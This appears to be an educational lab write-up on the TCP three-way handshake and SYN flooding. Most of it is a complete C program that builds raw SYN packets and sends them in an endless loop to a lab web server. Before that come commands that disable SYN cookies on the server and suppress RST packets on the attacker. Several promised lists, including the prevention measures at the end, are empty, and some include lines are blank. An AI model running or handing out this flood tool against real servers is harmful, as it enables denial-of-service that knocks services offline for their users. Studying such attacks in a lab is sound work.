The three-way handshake is the method of a client to establish a connection to a server. This mechanism allows both client and server to obtain the network TCP socket information before transferring data. Also, the three-way handshake allows the server to multiplex a number of TCP connections to various clients.
The three-way handshake works as follows:
SYN flooding is a vulnerability in which SYN messages are sent numerous times by clients to the server. So the server keeps waiting for the ACK messages from these clients, and while the socket backlog keeps filling out, the server would not be able to serve other TCP connections to incoming clients. SYN flooding is one type of a DoS (i.e., Denial of Service) attack. This exploit attempts to use all of the available resources of the server due to the nature of the server multiplexing TCP connections and waiting for the ACK messages from incoming clients.
In order to demonstrate the vulnerability, we have provided the steps to create an environment, where one VM is the attacker and the other is a web server.
For the web server, we have the following:
For the attacker's machine, this is the following setup:
After the demo setup you can run the syn flood code to dos attack on web server (may take a few seconds until website is unavailable)
You will need to run the following on the web server VM:
sudo sysctl -n net.ipv4.tcp_syncookiessudo sysctl -w net.ipv4.tcp_syncookies=0sudo sysctl -w net.ipv4.tcp_max_syn_backlog = 100 (number of connections allowed)sudo sysctl -w net.ipv4.tcp_synack_retries = 3 (limit number of retries to connect)
On the attacker's VM, add the following rule to the iptable: sudo iptables –A OUTPUT –p tcp --tcp-flags ALL RST –j DROP
The iptable rule is to stop the Ubuntu from being nice and sending TCP reset packets to the web server.
/*
Syn Flood DOS with LINUX sockets
*/
#include
#include //memset
#include
#include //for exit(0);
#include //For errno - the error number
#include //Provides declarations for tcp header
#include //Provides declarations for ip header
#include
struct pseudo_header //needed for checksum calculation
{
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
};
unsigned short csum(unsigned short *ptr,int nbytes) {
register long sum;
unsigned short oddbyte;
register short answer;
sum=0;
while(nbytes>1) {
sum+=*ptr++;
nbytes-=2;
}
if(nbytes==1) {
oddbyte=0;
*((u_char*)&oddbyte)=*(u_char*)ptr;
sum+=oddbyte;
}
sum = (sum>>16)+(sum & 0xffff);
sum = sum + (sum>>16);
answer=(short)~sum;
return(answer);
}
int main (void)
{
//Create a raw socket
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
//Datagram to represent the packet
char datagram[4096] , source_ip[32];
//IP header
struct iphdr *iph = (struct iphdr *) datagram;
//TCP header
struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
struct sockaddr_in sin;
struct pseudo_header psh;
strcpy(source_ip , "192.168.56.101");
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = inet_addr ("192.168.56.102");
memset (datagram, 0, 4096); /* zero out the buffer */
//Fill in the IP Header
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
iph->id = htons(54321); //Id of this packet
iph->frag_off = 0;
iph->ttl = 255;
iph->protocol = IPPROTO_TCP;
iph->check = 0; //Set to 0 before calculating checksum
iph->saddr = inet_addr ( source_ip ); //Spoof the source ip address
iph->daddr = sin.sin_addr.s_addr;
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
//TCP Header
tcph->source = htons (1234);
tcph->dest = htons (80);
tcph->seq = 0;
tcph->ack_seq = 0;
tcph->doff = 5; /* first and only tcp segment */
tcph->fin=0;
tcph->syn=1;
tcph->rst=0;
tcph->psh=0;
tcph->ack=0;
tcph->urg=0;
tcph->window = htons (5840); /* maximum allowed window size */
tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
should fill in the correct checksum during transmission */
tcph->urg_ptr = 0;
//Now the IP checksum
psh.source_address = inet_addr( source_ip );
psh.dest_address = sin.sin_addr.s_addr;
psh.placeholder = 0;
psh.protocol = IPPROTO_TCP;
psh.tcp_length = htons(20);
memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
//IP_HDRINCL to tell the kernel that headers are included in the packet
int one = 1;
const int *val = &one;
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
{
printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror(errno));
exit(0);
}
//Uncommend the loop if you want to flood :)
int j = 0;
while (1)
{
tcph->check = 0;
tcph->source = htons (rand() + 1024);
psh.source_address = inet_addr( source_ip );
psh.dest_address = sin.sin_addr.s_addr;
psh.placeholder = 0;
psh.protocol = IPPROTO_TCP;
psh.tcp_length = htons(20);
memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));
tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));
j++;
//Send the packet
if (sendto (s, /* our socket */
datagram, /* the buffer containing headers and data */
iph->tot_len, /* total length of our datagram */
0, /* routing flags, normally always 0 */
(struct sockaddr *) &sin, /* socket addr, just like in */
sizeof (sin)) < 0) /* a normal send() */
{
printf ("error\n");
}
//Data send successfully
else
{
printf ("Packet Send \n");
//sleep(1);
}
}
return 0;
}
There are three ways to prevent a SYN flooding attack by considering the following: